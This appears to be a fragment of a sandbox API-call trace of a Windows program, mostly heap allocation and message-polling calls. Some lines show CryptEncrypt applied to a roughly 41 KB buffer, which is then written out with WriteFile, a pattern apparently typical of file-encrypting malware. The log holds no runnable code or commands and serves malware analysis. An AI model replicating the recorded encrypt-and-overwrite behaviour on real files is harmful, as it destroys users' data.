1 [0220.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0220.040] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0220.040] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.040] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.041] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0220.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0220.041] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0220.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab950 [0220.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.042] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab8900 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0220.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0220.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.045] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa07d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa080) returned 1 [0220.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.046] CharLowerBuffW (in: lpsz="byte[41088]", cchLength=0xb | out: lpsz="byte[41088]") returned 0xb [0220.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.046] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.047] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.047] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.047] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ab8900*, pdwDataLen=0x8cef60*=0xa07d, dwBufLen=0xa080 | out: pbData=0x2ab8900*, pdwDataLen=0x8cef60*=0xa080) returned 1 [0220.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.049] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.049] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.049] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.049] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.049] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.049] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.049] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.049] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.055] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.055] WriteFile (in: hFile=0x510, lpBuffer=0x2a941c0*, nNumberOfBytesToWrite=0xa080, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a941c0*, lpNumberOfBytesWritten=0x8cf5e4*=0xa080, lpOverlapped=0x0) returned 1 [0220.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.056] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0220.056] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.056] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0220.056] PeekMessageW (in: lpMsg=0x8cf3a0, 